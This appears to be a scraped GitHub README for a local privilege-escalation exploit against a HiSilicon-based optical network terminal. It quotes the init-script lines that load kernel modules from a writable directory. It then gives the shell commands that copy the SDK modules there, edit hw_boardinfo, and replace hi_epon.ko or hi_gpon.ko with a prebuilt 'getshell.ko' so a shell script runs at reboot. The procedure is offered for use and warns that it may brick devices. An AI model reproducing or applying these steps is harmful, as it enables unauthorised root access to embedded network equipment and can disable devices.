Note

This maybe brick your ONT device, use at your own risk!

Usage

Find an exploit to load userdefined ko module

an exploit in /etc/rc.d/rc.start/1.sdk_init.sh, use kernel module .ko to run a shell script /mnt/jffs2/hw/getshell.sh when system reboot.

Logical exploit in line 200-206

# load hisi modules
if [ -f /mnt/jffs2/TranStar/hi_sysctl.ko ]; then
	  cd /mnt/jffs2/TranStar/
	  echo "Loading the Temp HISI SD511X modules: "
else
	  cd /lib/modules/hisi_sdk
	  echo "Loading the HISI SD511X modules: "
fi

if /mnt/jffs2/TranStar/hi_sysctl.ko exsit, then execute cd /mnt/jffs2/TranStar/. That means work directory is /mnt/jffs2/TranStar/ now, and /mnt/jffs2/TranStar/ is writable. so

mkdir -p /mnt/jffs2/TranStar/
cp -rf /lib/modules/hisi_sdk/* /mnt/jffs2/TranStar/

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

obj.id = "0x00000001" ; obj.value = "4";

Upload getshell.ko module, compiled by 0neday, only support r019

# just for gpon
cp getshell.ko /mnt/jffs2/TranStar/hi_epon.ko

# or for epon
cp getshell.ko /mnt/jffs2/TranStar/hi_gpon.ko

License

GPLv3.0

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

readme.md

readme.md

Note

Usage

Find an exploit to load userdefined ko module

Logical exploit in line 200-206

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

Upload getshell.ko module, compiled by 0neday, only support r019

License

Files

readme.md

Latest commit

History

readme.md

File metadata and controls

Note

Usage

Find an exploit to load userdefined ko module

Logical exploit in line 200-206

In order to excute line 261-262, change in /mnt/jffs2/hw_boardinfo

Upload getshell.ko module, compiled by 0neday, only support r019

License